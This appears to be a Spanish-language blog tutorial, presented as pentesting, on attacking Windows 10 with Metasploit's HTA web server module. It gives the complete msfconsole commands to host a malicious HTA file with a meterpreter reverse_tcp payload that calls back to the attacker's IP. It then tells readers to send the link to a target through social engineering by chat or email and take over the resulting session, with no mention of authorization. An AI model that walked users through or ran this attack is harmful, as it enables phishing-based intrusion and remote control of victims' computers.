Pentesting Remoto Windows 10 usando HTA Web Server

Este módulo aloja una HTML Application (HTA) que, cuando se abre, ejecutará una payload (carga útil) a través de Powershell. Cuando un usuario navega hacia el archivo HTA, Windows te alertará dos veces antes de que se ejecute la carga útil

Nota

Este método, de hace algunos años, desgraciadamente funciona con Windows Defender desactivado. Un usuario (Jesus P. M), a través de la fanpage de FB, me solicitó el tutorial y aquí está. Un saludo Jesus!.

Objetivos de explotación

Windows Todas las versiones
Pentester: Parrot OS (Puedes usar Kali Linux u otra de las 5 mejores distros Linux para pruebas de seguridad)
Objetivo: Windows 10

Tabla de Contenido

Pentesting con HTA Web Server

Pentesting con HTA Web Server

Abre el terminal e inicia el Metasploit Framework (MSF):

msfconsole

Creamos la payload con los siguientes comandos:

use exploit/windows/misc/hta_server
set lhost <tu_IP>
set srvhost <tu_IP>
set payload windows/meterpreter/reverse_tcp
set lport 8443
exploit

Para conocer tu IP abre una nueva terminal y ejecuta el comando ifconfig.

Lo hecho anteriormente creará un URL con el archivo infeccioso. Envía el enlace del servidor al objetivo por chat o correo electrónico o cualquier técnica de ingeniería social.

Cuando el ordenador objetivo navegue hacía tu enlace, descargará un archivo del tipo abcxyz.hta, y cuando el objetivo haga clic en él obtendrás la sesión de meterpreter.

Ahora tienes acceso a la PC del objetivo. Utiliza el comando “sessions -i” y el número de sesión para conectarte a la sesión.

2 Comentarios

YanielCast dice:
7 marzo, 2021 a las 7:46 pm
¿Algún método de este tipo que funcione con desde un Windows?
Responder
1. Alexynior dice:
  8 marzo, 2021 a las 6:37 pm
  Puedes utilizar una máquina virtual 🤔
  Responder

Deja una respuesta Cancelar la respuesta

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.

Cómo Recuperar Fotos Borradas en tu Mac

LEAKEY: Comprueba y Valida las Credenciales Filtradas

Hauditor: Una Herramienta para Analizar Encabezados de Seguridad

CryptoTester: Utilidad para Jugar con la Criptografía. Análisis de Ransomware

Cómo los Hackers Cambian la IP y la Ubicación Automáticamente en Pocos Segundos

Secator: La Navaja Suiza del Pentester

CAINE: Distribución GNU/Linux de Medicina Forense Digital

Pentoo: Distribución para Pruebas de Penetración

BackBox: Distribución Linux para Evaluación de Seguridad y Pruebas de Penetración

+30 Ejemplos Útiles del Uso del Comando netsh en Windows

Ghost Spectre: ¿Por qué no Confiar en las ISO Personalizadas de Windows?

Revelamos Truco para Cargar Cualquier Programa al Finalizar Instalación de Windows 11

apk.sh: Facilita la Ingeniería Inversa de Aplicaciones Android

WeTube: Experiencia Ligera de YouTube para Android (Código Abierto)

Cómo Rastrear a Alguien que Recibió un iPhone de Regalo

Liderazgo que transforma fábricas en historias de éxito

X-snifer: Análisis Web y Reconocimiento de Red

Las 5 Mejores Plataformas CTF en 2025

Pentesting Remoto Windows 10 usando HTA Web Server

Pentesting con HTA Web Server

CryptoTester: Utilidad para Jugar con la Criptografía. Análisis de Ransomware

Cómo los Hackers Cambian la IP y la Ubicación Automáticamente en Pocos Segundos

CryptoTester: Utilidad para Jugar con la Criptografía. Análisis de Ransomware

Cómo los Hackers Cambian la IP y la Ubicación Automáticamente en Pocos Segundos

Secator: La Navaja Suiza del Pentester

My Cart Close (×)

Pentesting Remoto Windows 10 usando HTA Web Server

Pentesting con HTA Web Server

My Cart Close (×)

SUSCRÍBETE